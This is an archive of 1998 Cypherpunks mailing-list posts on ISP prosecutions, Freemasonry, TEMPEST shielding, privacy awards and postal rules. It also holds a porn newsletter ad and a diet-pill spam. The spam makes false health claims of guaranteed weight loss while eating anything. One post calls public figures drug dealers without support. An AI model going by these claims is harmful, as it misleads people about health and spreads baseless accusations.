further information on the attempts to criminally charge ISPs over
Usenet content, available on their web site.
 
ISPs may face charges over child porn
By Paul Festa
Staff Writer, CNET News.com
October 30, 1998, 5:35 p.m. PT
 
A few exerpts...
 
    As many as five Internet service providers may face
    serious legal charges for providing access to
    newsgroups used by child pornographers in cases that
    critics are calling election-eve politics.
 
    New York Attorney General Dennis Vacco won praise this
    week for his role in an international crackdown on an
    online child pornography ring. But critics have accused
    Vacco, up for reelection Tuesday, of breaking the law
    and playing politics in probing two New York state ISPs
    as part of the crackdown and seizing their newsgroup
    servers.
 
    Three more ISPs--two on the West Coast and one in the
    Midwest--are likely to receive search warrants in
    coming weeks, the attorney general's office told CNET
    News.com today.
 
    ...
 
    Law enforcement officials have not arrested or charged
    anyone affiliated with the ISPs. But the businesses,
    which provided access to the newsgroups, are under
    investigation for what Vacco's office describes as the
    knowing possession of criminal images.
 
    "The servers were confiscated as part of ongoing
    investigation," said Marc Wurzel, spokesman for the
    attorney general. "The ISPs were in possession of
    illegal images of children engaged in sex acts. In both
    cases, they were forewarned that they were in
    possession of illegal images."
 
    The notification came in the form of an email inquiry
    sent by an undercover agent. The agent posed as a
    student wanting to know whether he would run afoul of
    the law by downloading child pornography he had found
    through the newsgroups.
 
    A third New York ISP, located in Albany, responded to
    the undercover inquiries by suspending the newsgroups.
    As a result, that ISP is not under investigation,
    Wurzel said.
 
    ...
 
    Coincidentally, Congress recently passed the Child
    Protection and Sexual Predator Punishment Act, which
    would make ISPs responsible for turning in their
    customers. Under that legislation, access providers who
    fail to report child pornography once they are made
    aware of it could be fined up to $50,000 for the first
    violation and up to $100,000 for each subsequent time
    they fail to contact law enforcement authorities.
 
    ...
 
 
    Vacco has pulled ahead in what only a few weeks ago
    was a tight race for reelection. In a New York
    Times-CBS poll taken in the first week of October,
    Republican Vacco and Democratic opponent Eliot Spitzer
    were statistically tied in their race for the state's
    top law enforcement spot. According to a Times-CBS poll
    released this week, Vacco is now ahead, 48 percent to
    36 percent, with 14 percent of the voters undecided.
 
--  
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 1 Nov 1998 04:27:59 +0800
To: Robert Hettinga <cypherpunks@cyberpass.net
Subject: Re: [RRE]The Return of Antimasonism in American Political Life
In-Reply-To: <v04020a05b2602e1192b0@[139.167.130.247]>
Message-ID: <199810311958.LAA27763@proxy4.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



    --
At 10:01 PM 10/30/98 -0500, Robert Hettinga wrote:
> I hate to be the one to break this to you, but the United 
> States is now a country in which a man who believes that 
> the President is an agent of the Illuminati has a regular 
> program on public television.

This is not quite as deranged as it seems.  The Masons are of
course not a conspiracy, but one of the services they provide
their members is a facility for constructing and operating
conspiracies.  As a result Masons have been big players on
all sides in most revolutions.

Conspiratorial political movements are common as weeds.  Most
of them aim at stealing nothing larger than arts grants,
fellowships, and research grants, and are often moderately
successful in this endeavor.  Some also aim at stealing
entire nations.  Most of these are not at all successful.  No
Masonic conspiracies have been successful in this, so far as
is known, and the Freemason movement would doubtless
disapprove of such excessive ambition and limitless greed.
The most famous success in stealing an entire nation was of
course Lenin's Bolshevik movement  (not a Masonic
conspiracy), where Lenin stole a bourgeois revolution by
conspiratorial means.  However since Lenin's coup bourgeois
revolutionaries have been on the alert against communist
plots, and the only other success in stealing a bourgeois
revolution from the outside was the Sandinistas in Nicaragua,
where (due to Violeta's naivete and excessive trustfulness)
they stole the revolution that Violeta Chamorro made.

The Masons, being explicitly pro bourgeoisie, would steal a
bourgeois revolution from the inside, if they ever stole a
revolution, which they do not appear to have done.  However,
being both bourgeois and pro bourgeoisie, if the masons were
to steal a bourgeois revolution, it would not be as
dramatically visible as it was when the Sandinistas stole the
Nicaraguan revolution, and I might well be unaware of it.

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     m6fnKPcFhJN/ZGzK/9gIxsmGc/k3Z43gHdDQUkjg
     4CZWSrYQlLd1bd2fAiS22I24OvT3hsupgfaM4bRTN
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvcm.com>
Date: Sun, 1 Nov 1998 07:12:11 +0800
To: Bill Stewart <bill.stewart@pobox.com>
Subject: Re: don't use passwords as private keys (was Re: Using a  password as a private key.)
In-Reply-To: <199810301443.OAA06479@server.eternity.org>
Message-ID: <v04003a02b26144df04eb@[24.1.50.17]>
MIME-Version: 1.0
Content-Type: text/plain



>If you're worried about RF noise, you have to assume the CPU or disk
>is also radiating enough for the spooks.  On the other hand,
>that video camera in the ceiling can watch your keystrokes,
>but can't watch the CPU.  That's when the paranoids worry about
>whether the KGB is sneaking in and copying their disk drive at night,
>and they start getting encrypted file system software. :-)

That's why some recommend that all secret e-mail be composed and encrypted
on a laptop while disconected from the AC mains, and better yet operated in
an open area (a park) or a place with lots of other electrical noise (a
mall).

--Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sun, 1 Nov 1998 07:43:58 +0800
To: cypherpunks@cyberpass.net
Subject: Re: [RRE]The Return of Antimasonism in American Political Life
In-Reply-To: <v04020a05b2602e1192b0@[139.167.130.247]>
Message-ID: <v03130314b261450acdb9@[209.66.100.110]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:42 AM -0800 10/31/98, James A. Donald wrote:
>    --
>At 10:01 PM 10/30/98 -0500, Robert Hettinga wrote:
>> I hate to be the one to break this to you, but the United
>> States is now a country in which a man who believes that
>> the President is an agent of the Illuminati has a regular
>> program on public television.
>
>This is not quite as deranged as it seems.  The Masons are of
>course not a conspiracy, but one of the services they provide
>their members is a facility for constructing and operating
>conspiracies.  As a result Masons have been big players on
>all sides in most revolutions.


Masons also had good contacts in what passed for the "intelligence
business" back a few hundred or more years ago. In a time when there was
not much mobility in Europe, as most folks worked farms or ran small shops,
masons were, by their nature, mobile and itinerant construction workers.
They moved to where large building projects were happening, then moved on
when the cathedral or bridge or whatever was completed.

They also needed places to stay when they were in town, so "masonic lodges"
developed. Paid for out of dues collected, with facilities then built.

(No need for such things today, what with hotels and such, but more needed
in, say, 1400.)

The Masons who moved around from town to town and who saw a lot and who met
with other Masons would have access to lots of intelligence about which
kings were planning to expand, about unrest in various areas, etc. Same as
the intelligence that village priests collected in the confessionals and
then fed back through secure channels to Rome. (Not surprising that the
Masons and the Catholics viewed each other with suspicion.)

And then there are the Knights Templars, Cathars, Priory of Sion, and all
the rest of that stuff. (An entertaining read is "Holy Blood, Holy Grail.")

And like many guilds and unions, the flow of knowledge was modulated in
various ways (as usual, to benefit the senior memembers, the bureaucrats,
the "shop stewards," and with the likely cuts to the local kings and
satraps).

There was the expected mumbo jumbo about the knowledge going back to the
Ancients, to the Pyramid builders (back side of the dollar bill fnord), and
secret handshakes (to serve as an indentity credential, as it were).

 Eventually the Masons learned to increase their revenues by letting in
folks who were not actually stoneworkers, and masonry became a professional
contact organization. Hence the large number of Masons who signed the
Declaration of Independence (to royalist Europe, surely a sign of
secularist conspiracy!).

And the memetic power of any secret society is such that various
revolutionaries, mystics, troublemakers, and such will claim connection to
various secret societies, or will recruit from them, etc. Illuminati,
Bilderbergers, Bohemian Grove, etc.

Besides, the Queen of England almost certainly _is_ a dealer of drugs, as
was George Bush and the Boy from Mena.

--Tim May

Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sun, 1 Nov 1998 05:53:27 +0800
To: "Hon  Anne McLellan mp Minister of Justice" <cypherpunks@toad.com>
Subject: Privacy International announces Big Brother awards  ( forwarded via CFD V2 # 670)
Message-ID: <199810312118.QAA15112@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain




Date: Sat, 31 Oct 1998 09:39:33 -0600
From: "Timothy Bloedow" <lydia@travel-net.com>
Subject: Privacy International announces Big Brother awards

BBC - October 27, 1998
Sci/Tech
Watching Big Brother
By Internet Correspondent Chris Nuttall

The first annual awards defending the individual's right to privacy have
been made at a ceremony in London.

The 1998 UK Big Brother Awards were held on the 50th anniversary of the
writing of George Orwell's novel, Nineteen Eighty-Four.

The pressure group Privacy International announced winners it judged to be
the modern-day equivalents of Big Brother in the novel, as well as
individuals who had fought to protect privacy, awarding them Winstons, the
name of the book's hero.

Privacy awards to go global
The academics, writers and lawyers who make up Privacy International
concentrated their first awards on the UK, but plan to extend them to other
countries over the next few years.

Hosting the awards, the activist comedian Mark Thomas said eight other
countries were interested in holding similar ceremonies next year.

The director of Privacy International, Simon Davies, said the time was now
right for the awards.

"Surveillance has now become an inbuilt component of every piece of
information technology on the planet, we've got a long way to go to wind the
clock back. I think these awards are the beginning of a movement," he said.

And the winners are ...

The Big Brothers were given for a number of categories:

Corporation: The British firm Procurement Services International received a
Big Brother award for selling surveillance equipment to Nigeria, Turkey and
Indonesia, three countries whose human rights records have been severely
criticised.

Local government: Newham Council in London won for using its 140 street
cameras and facial-recognition software to try to pick out criminals in
crowds.

National government: The Department of Trade and Industry (DTI) was named a
Big Brother over its plans for the police to have access through a third
party to the keys to any information sent electronically that was locked by
encryption.

Product: Software by Harlequin that examines telephone records and is able
to compare numbers dialled in order to group users into 'friendship
networks' won this category. It avoids the legal requirements needed for
phone tapping.

Lifetime achievement award: Menwith Hill in Yorkshire, a listening station
used by America's National Security Agency and described as the biggest US
spy station in the world, won this special award.
None of the winners were present to accept their awards. But a video was
shown of a receptionist at Newham Council receiving a Big Brother earlier in
the day and of several police dragging a Privacy International campaigner
out of the DTI's headquarters after he had tried to present it.

Winstons were awarded to three individuals, cited for campaigning at Menwith
Hill, documenting police surveillance and pursuing a privacy case against a
landlord who had installed a two-way mirror in a 19-year-old woman's flat.

? BBC

------------------------------

Jean-Francois Avon, B.Sc. Physics, Montreal, Canada
  DePompadour, Socit d'Importation Lte
     Limoges fine porcelain and french crystal
  JFA Technologies, R&D physicists & engineers
     Instrumentation & control, LabView programming
PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 1 Nov 1998 08:23:00 +0800
To: cypherpunks@cyberpass.net
Subject: Re: don't use passwords as private keys (was Re: Using a   password as a private key.)
In-Reply-To: <3.0.5.32.19981030182933.008baae0@idiom.com>
Message-ID: <199810312353.SAA23037@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Steve Schear wrote:

>That's why some recommend that all secret e-mail be composed and encrypted
>on a laptop while disconected from the AC mains, and better yet operated in
>an open area (a park) or a place with lots of other electrical noise (a
>mall).

Not to beat an NDA horse but while we're waiting for NSA to
process our FOIA request for TEMPEST docs, are there
products available to shield a desktop box, or better, a laptop?

We're so ignorant of what's allegedly in the classified docs
that we're trying to design a glass box with RF glazing materials
supplied by a corp that makes it for buildings. It would fit over
the box, keyboard and monitor, and should shield them, but 
leaves cables and power lines to solve, not counting how to get 
our hands into the keyboard. As an alternative we're looking at
a reengineered CAD tablet with puck to select letters and/or 
words/phrases, or maybe a voice gadget. Yeh, yeh, bugs in 
the lamp, but one solution at a time.

If we get it to work, or at least credibly marketable to people more 
techno-stupid than we are, following the cryptography model,
we figure we'll position it as an upscale decorative hot shit 
privacy fashion statement, an anti-spy-tech ensemble made of
temperature sensitive glass to change thoughout the day or as 
passions wax and wane with the market and self-image. 

Retail price: oh, maybe, $25,000 for 100% assured RF protection
("Not Even NSA Can Snoop!) of your secret business communications 
and sordid affairs, give or take a few leakages that'll never be missed 
until the mate's PI burgles the crystal. 

Someone's going to suggest a copper screen sandwiched in pinstriped
serge, but how do you see the monitor? Or a Frank Gehry-warped
Faraday cage, or god knows what's under the NDA blanket. However, 
time's running out: when NSA releases those 12 TEMPEST docs next 
summer that 1000% percent markup on classified TEMPEST products 
is going down.

The market's going to be flooded with certified fakes, ours leading.
The brand name's a secret but you'll see it on the ticker.

Speaking of promo, we saw last night on the Free Congress site a reference
to a report titled "Cyhperpunks v. Cryptocrats: The Battle Over US Encryption
Standards," by Lisa S. Dean. We missed that in the past and the site only
cites it without a link. Anybody know of it, and how to get it? See:

   http://www.freecongress.org/ctp/echelon.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Sun, 1 Nov 1998 11:31:25 +0800
To: Rpagejr@teclink.net
Subject: euclid and terrorism
Message-ID: <363BC80C.770D@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

http://sunset.backbone.olemiss.edu/~rpagejr/euclid.html

I am into hi-tech stuff.  

But I studied Lobaschevsky and Reimann. 

Attached is mirrored at http://www.aci.net/kalliste/bw1 

And, I hope I recall correctly from Omar Khayyam

  ... the moving hand writes, having writ moves on, nor all thy
  piety or wit can call it back to cancel half a line of it. ...

Best - I am not reading e-mail at send address

bill

Title: Black and White Test of Cryptographic Algorithms




	

	
		
			
				
					Jump to Forum
					Click Image to Jump to Next Article 
					Go to Text Only Print Version 
				
			
			
			Black and White Test
			of Cryptographic Algorithms
			by William H. Payne
			This article requires special formatting.
			Please Click Here to Read
			
				Send This Article to a Friend:
				
					
						
						 
					
						
							Your Name:
					
					
						
							
					
				
				
					 
					
						
							Email Address of your Friend: 
					
					
						
							
					
				
				
					 
					
						
							Your Email address:
					
					
						
							
					
				
				
					 
					 
					 
				
				
					 
					
						
							
					
				
			
			 
			Back to Home Page
			Quick Menu 
			Visit the Button Shop 
			
			
			Interactive Forum
			Black and White Test
			of Cryptographic Algorithms
			
			
			
			
			
			E-mail the Editor
			
			
			
			
			
			
			 
		
	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sun, 1 Nov 1998 12:59:08 +0800
To: cypherpunks@cyberpass.net
Subject: TEMPEST laptops
In-Reply-To: <v04003a02b26144df04eb@[24.1.50.17]>
Message-ID: <v03130315b2618c270619@[209.66.100.110]>
MIME-Version: 1.0
Content-Type: text/plain



At 3:44 PM -0800 10/31/98, John Young wrote:
>Steve Schear wrote:
>
>>That's why some recommend that all secret e-mail be composed and encrypted
>>on a laptop while disconected from the AC mains, and better yet operated in
>>an open area (a park) or a place with lots of other electrical noise (a
>>mall).
>
>Not to beat an NDA horse but while we're waiting for NSA to
>process our FOIA request for TEMPEST docs, are there
>products available to shield a desktop box, or better, a laptop?

I haven't been following this FOIA request for TEMPEST docs. It seems
pointless, for several reasons:

1. No doubt a lot of stuff will be classified, and FOIA can't break
classification, generally.

2. The physics is what's important, not TEMPEST specs on specfific pieces
of equipment the government may be using, etc.

3. Direct tests on current equipment is more important, anyway.


>We're so ignorant of what's allegedly in the classified docs
>that we're trying to design a glass box with RF glazing materials
>supplied by a corp that makes it for buildings.

Why would something designed for large-scale structures like buildings be
all that useful for shielding a laptop? While it _might_ be useful, there
are building tradeoffs that don't apply to shielding smaller objects.

Why not just go with copper, for example? Or mu-metal? Or even mesh?


>It would fit over
>the box, keyboard and monitor, and should shield them, but
>leaves cables and power lines to solve, not counting how to get
>our hands into the keyboard. As an alternative we're looking at
>a reengineered CAD tablet with puck to select letters and/or
>words/phrases, or maybe a voice gadget. Yeh, yeh, bugs in
>the lamp, but one solution at a time.
>

I don't know who you're doing this project for, but I would approach it
from a different point of view.

* Laptop under battery power...no leakage through a.c. lines

* inside a copper box made of, say, 10-gauge copper. All joints soldered.

* viewing through a kind of viewing hood, with each eye having a couple of
layers of mesh close to the eyes...this should not interfere too much with
viewing the screen (some experimentation would be needed).

* control of keyboard could be done in a couple of ways, e.g.,

-- flexibible gloves coated with conductive material (the skin depth is
likely insufficient to block RF to 80 or so dB, but the combination of
attenuation and limited exit diameter (at the wrists) may be sufficient

-- a new external keyboard with only fiber-optic connections to the
computer, and with no significant local processing, and only low
voltages...I would not be surprised if a keyboard with essentially no
key-varying RF emissions could be built (operating frequency can of course
be very, very low, e.g., a kilohertz or less, and with low voltages, etc.)

-- mouse input, if necessary, can be done with optical mice with infrared
links (helped along with light pipes). No RF to speak of, though this would
have to be characterized in detail.


>If we get it to work, or at least credibly marketable to people more
>techno-stupid than we are, following the cryptography model,
>we figure we'll position it as an upscale decorative hot shit
>privacy fashion statement, an anti-spy-tech ensemble made of
>temperature sensitive glass to change thoughout the day or as
>passions wax and wane with the market and self-image.

I'll follow your business plans with interest.

Not to sound like a cynic (you all know I am, though), but this kind of
"crypto chic" marketing ploy seems doomed to failure. "Privacy fashion
statement" indeed.

>Retail price: oh, maybe, $25,000 for 100% assured RF protection
>("Not Even NSA Can Snoop!) of your secret business communications
>and sordid affairs, give or take a few leakages that'll never be missed
>until the mate's PI burgles the crystal.

What more can I say?

>
>Someone's going to suggest a copper screen sandwiched in pinstriped
>serge, but how do you see the monitor? Or a Frank Gehry-warped
>Faraday cage, or god knows what's under the NDA blanket. However,
>time's running out: when NSA releases those 12 TEMPEST docs next
>summer that 1000% percent markup on classified TEMPEST products
>is going down.
>
>The market's going to be flooded with certified fakes, ours leading.
>The brand name's a secret but you'll see it on the ticker.

Well, I got trolled, it appears, by one of John Young's coleridged rhymes
(and rimes).

I wasted my time addressing what I thought 'til the end was a semi-real, if
flaky, proposal to market a TEMPESTed computer. How stupid of me. I should
know by now never to take John seriously.

--Tim May

Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sun, 1 Nov 1998 11:52:29 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: update.400 (fwd)
Message-ID: <199811010336.VAA30076@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 29 Oct 1998 09:24:37 -0500 (EST)
> From: physnews@aip.org (AIP listserver)
> Subject: update.400

> PROTONS PERSIST for at least 1.6 x 10^33 years. With few

> THE CONDUCTANCE OF A SINGLE MOLECULE has been
> measured directly by having the molecule bridge the break in a thin
> wire.  Scientists at Yale use the wire ends as electrodes for sending
> current through a small polymer molecule poised between them. 
> Previously the electrical properties of single molecules had been
> studied, but this was through the use of a probe  microscope which
> samples the molecule across a vacuum gap. Mark Reed (203-432-
> 4300, reed@surf.eng.yale.edu) reports  that the current-versus-voltage
> characteristics of the molecule (important for any potential device
> application) resemble those of a quantum dot in that certain electron
> energies are preferred over others, in this case because of the internal
> energy levels of the molecule itself. (Paper to be presented at the
> American Vacuum Society (AVS) meeting in Baltimore, 2-6
> November 1998, website:
> http://www.vacuum.org/symposium/program.html)

> STACKED ORGANIC LIGHT EMITTING DEVICES (SOLEDs)
> produce full color but take up less real estate on a chip than their
> planar counterparts which require 3 single-color pixels.  This higher
> resolution, as well as tunability and good saturation (vivid primary
> colors rather than pastels), can now be had with the same voltages
> and efficiencies that apply to previous  organic displays. Paul
> Burrows of Princeton (burrows@ee.princeton.edu) believes
> computer-sized flat panel displays using SOLEDs will be available
> within a few years.  Smaller displays such as for cellphones may be
> realized even earlier.   (Paper at the AVS meeting.)

> NANOCOMPUTERS IN A BOTTLE.  UCLA scientist James Heath
> and his Hewlett Packard collaborators Stan Williams and Phil Kuekes
> hope to grow computers in chemical solution by building up arrays of
> atoms or molecules (at first in two-dimensional planes but later in
> three-dimensional volumes) linked together with tiny wires, perhaps
> eventually carbon nanotubes.  Such a computer could be tiny (smaller
> than a sand grain), energy efficient (10,000 times more so than current
> silicon computers), and capable of new tricks, such as being able to
> sense and respond to its environment through chemically activated
> switches.  Implementing a chemically assembled computer will depend
> on a high degree of defect tolerance in the wiring, unlike today's
> microprocessors which require wiring  perfection.  Presently the
> UCLA-HP group will be doing rudimentary calculations with a
> computer including some components at the nano and  others at the
> micro level. An all-nano computer performing simple computations,
> Heath believes, is a couple of years away.  Serious applications would
> follow years later.  Heath (310-825-2836, heath@chem.ucla.edu) will
> report on nanocomputers at the AVS meeting.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 1 Nov 1998 05:52:09 +0800
To: cypherpunks@cyberpass.net
Subject: Re: network computers, web TV, java
Message-ID: <199810312112.WAA12569@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




At 01:31 AM 10/31/98 -0800, Vladimir Z. Nuri wrote:
>hi BLANK
>a company has a *reponsibility* to its customers. perhaps
>you would care to deny that?? gates has a *responsibility*
>to his customers. what is that responsibility? to create
>products they want. to anticipate their needs. 

Wrong from go.  The company has a responsibility to its
owners, the shareholders typically.  The customers are
responsible to themselves for making the best purchases.
Everything falls out of these.









  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Albert P. Franco, II" <apf2@ctv.es>
Date: Mon, 2 Nov 1998 10:32:23 +0800
To: cypherpunks@cyberpass.net
Subject: RE: UK police chase crooks on CCTV (fwd)
Message-ID: <3.0.3.32.19981031204048.0088de80@pop.ctv.es>
MIME-Version: 1.0
Content-Type: text/plain



Snipped down to DCF's response...

>My point is not that we shouldn't grab them it's that the "Human Rights
>Community" is politically discriminatory and wouldn't think of going after
>commies.
>

Since I live in Spain, I am privy to a side of the story that doesn't seem
to get much air outside of Spain. (At least not that I've seen) In Spain,
Spain is the protagonist in this issue--not the "Human Rights Community".
It may be that they accept any help they may get from these folks, but the
main push is from the families of Spanish citizens murdered by Pinochet. He
not only killed his "countrymen" but also foreign nationals. Spain will try
him for the murders of Spaniards NOT Argentineans, Brazilians, Americans,
or any other nationality. 

>From inside Spain this issue doesn't seem nearly as global as the
international community portrays it. I guess it's kind of like a certain
African nation wanting to try a certain western hemisphere president for
the deaths of some factory workers... Or perhaps in a small way a
refutation of the international norm that protects rulers from the
otherwise natural consequence of their actions.

APF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Tue, 11 May 1999 01:26:49 +0800
To: cypherpunks@cyberpass.net
Subject: USPS "Know Your Customer" Draws Fire
Message-ID: <199810270748.BAA00246@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Privacy advocates are beginning to take notice of the implications
of the new Postal Service regulations concerning private mailboxes.

-----

SACRAMENTO -- New postal regulations will make private mailboxes
"private" no more, may endanger individual safety, and represent
another government attack on privacy that should not be tolerated, the
Libertarian Party of California announced today.
 
"Why must government continue to erode individual privacy?" asked
Libertarian state chair Mark Hinkle. "What's next? Eliminating
unlisted phone numbers? Criminalizing the use of pseudonyms?"
 
Under the new rules, published in the March 25th Federal Register,
private mailbox customers will now be required to show two forms of ID
-- including one with a photo -- when applying to rent, and mail
delivered to private mailboxes must bear a new address designation,
"PMB," or risk being undelivered. The rules went into effect April
26th.
 
According to the Postal Service, the new rules are designed to combat
mail fraud. But that sounds eerily like another recent government
proposal, Hinkle noted. "It's 'Know Your Customer' all over again. The
government just keeps wanting to invade our privacy."
 
"Know Your Customer" was the name given to proposed government
regulations that would have required banks to develop profiles on
every customer and report suspicious banking activity to the
government. Thanks to a campaign led by the Libertarian Party, the
Federal Deposit Insurance Corporation rescinded the proposed rules in
March.
 
But the similarities remain:
 
* The postal regulations will increase the burden on "Commercial Mail
Receiving Agencies" -- or CMRAs as private mailbox businesses like
Mailboxes Etc. are known -- by making them responsible for verifying
the customer's identity.
 
"Mailbox companies have an interest in reducing fraud but not in
inconveniencing customers," said Hinkle. "Their employees should not
have to act as deputies for the Postal Service."
 
* The rules will eliminate the privacy enjoyed by CMRA customers --
and may endanger some of them.
 
"Private mailbox renters often have very good reasons for keeping a
low profile, such as battered spouses in hiding, celebrities, and law
enforcement officers who want to keep their home addresses
confidential," Hinkle pointed out. "The Postal Service is literally
endangering these individuals."
 
Small businesses started in a home or a garage may rent a private box
to give the appearance of having a physical office. "Thanks to the PMB
designation, all that privacy is now gone and those businesses will
probably suffer as a result," said Hinkle.
 
Even worse, anyone -- not just the police -- can request to see a
customer's application information if that customer is doing or
soliciting business from their private mailbox.
 
* Most troubling, the regulations operate under the assumption that
the customer is guilty until proven innocent.
 
"Just like with 'Know Your Customer,' the Postal Service is depriving
the many of their liberties for the sake of a very small few
lawbreakers. The problem is, criminals do not follow the law and will
find ways around these rules while law-abiding customers are forced to
sacrifice their privacy," charged Hinkle.
 
There's one crucial difference between "Know Your Customer" and the
new postal regulations: whereas "Know Your Customer" was a proposed
rule, the Postal Service has already adopted the new rules, having
first proposed them in August, 1997.
 
"With 8,645 regulations adopted in the last two years, it's easy to
see how this one slipped through the cracks," Hinkle concluded.
"Libertarians denounce the new postal regulations and call on Congress
to recognize the erosion of American privacy -- and to stop it before
privacy goes the way of the Pony Express."

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Thu, 1 Oct 1998 02:47:39 -0700 (PDT)
To: (STUFFED THURSDAY OCTOBER 1 1998)
Subject: TODAY'S NEWS AND PICS PACKED STUFFED! - READ IT NOW!
Message-ID: <19981001071000.25713.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 FREE HOT JPEG PHOTOS
+ 5 SUPER SEXY STORIES
+ GOP SMUTMONGERS
+ SEX SEX SEX
+ THE ANGRY DWARF
+ STARR DODGES A BULLET
+ EROTIC SPICES
+ THE BEST OF EUREKA
+ FLEA GATE
+ WHERE'S THE BEEF

       ---->   http://stuffed.net/98/10/1/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/10/1/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ExplodeIncome@urgentmail.com
Date: Thu, 1 Oct 1998 06:17:43 -0700 (PDT)
To: No@Nope533.com
Subject: :)  :)  Shed The Pounds The Easy Way  :)  :)
Message-ID: <0031600011057606000002L062*@MHS>
MIME-Version: 1.0
Content-Type: text/plain


EAT! EAT! EAT!
And Still Lose Weight!  No Joke!
Need To Lose Weight Quick?  Don't Have Time To Exercise?
HERE'S YOUR ANSWER!
And You Can Eat As Much As You Want!

Introducing Slender Now(tm)
GUARANTEED WEIGHT LOSS FOR LIFE!

How Confident Are We?...
In 30 Days If You're Not Completely Satisfied With 
This System, Send The "Empty" Bottles Back For FULL Refund!

This System Is So Effective, Test Subjects Typically
Lose 10 - 15 Pounds of FAT in the FIRST MONTH!
More Importantly, The Rebound Effect So Common 
With Other Forms Of Weight Loss Has Been Eliminated.


* A NO-FAIL Slender Now(tm) BURN, BIND, BLOCK and BUILD System 
BURN - StimuLean(tm) - A Unique Herbal Thermogenic Formula that allows
stored fats to be turned into energy (see below).
BIND - SlenderLean(tm) - A unique state-of-the-art fiber-based product that binds
 up to 40 grams (360 fat calories) of dietary fat from the foods you've just eaten, 
therefore throwing these excess fat calories out of your body as waste rather than 
storing them as fat (see below).
BLOCK - Phase'oLean(tm) - It's back!  Dr. Marshall's Exclusive STARCH 
BLOCKER(tm) FORMULA has been approved for re-release for the first 
time in 15 years! Each tablet has the capacity to block the digestion and 
absorption 	of more than 100 grams or more than 400 calories of 
starch (see below).
BUILD - Aminolyze(tm) - This product contains the specific amino acids 
necessary for your body to make new collagen.  It helps maintain lean 
body mass and build muscle tissue; very important while losing weight.  
You burn fat, rather than muscle, which helps to maintain a healthy lean 
body mass ratio 

* Eat as much as you want! 
* Your energy level will skyrocket!
* 100% safe and all natural!
* Get results in two weeks!
* 30 Day Money back guarantee - no questions asked! 


* EAT AS MUCH AS YOU WANT!  That's right, you can continue to 
eat your favorite high calorie foods and still lose weight!  That was 
mpossible until now!  With the revolutionary Slender Now(tm) System, 
you can enjoy your favorite foods like steak, pork, eggs and dairy 
products and still achieve your goal.
* 100% SAFE AND ALL NATURAL!  The Slender Now(tm) System 
contains no preservatives, sugar, starch, salt, wheat, yeast, milk, soy 
derivatives, artificial flavoring or coloring agents.  
* GET RESULTS IN TWO WEEKS!	90% of our clients are experiencing 
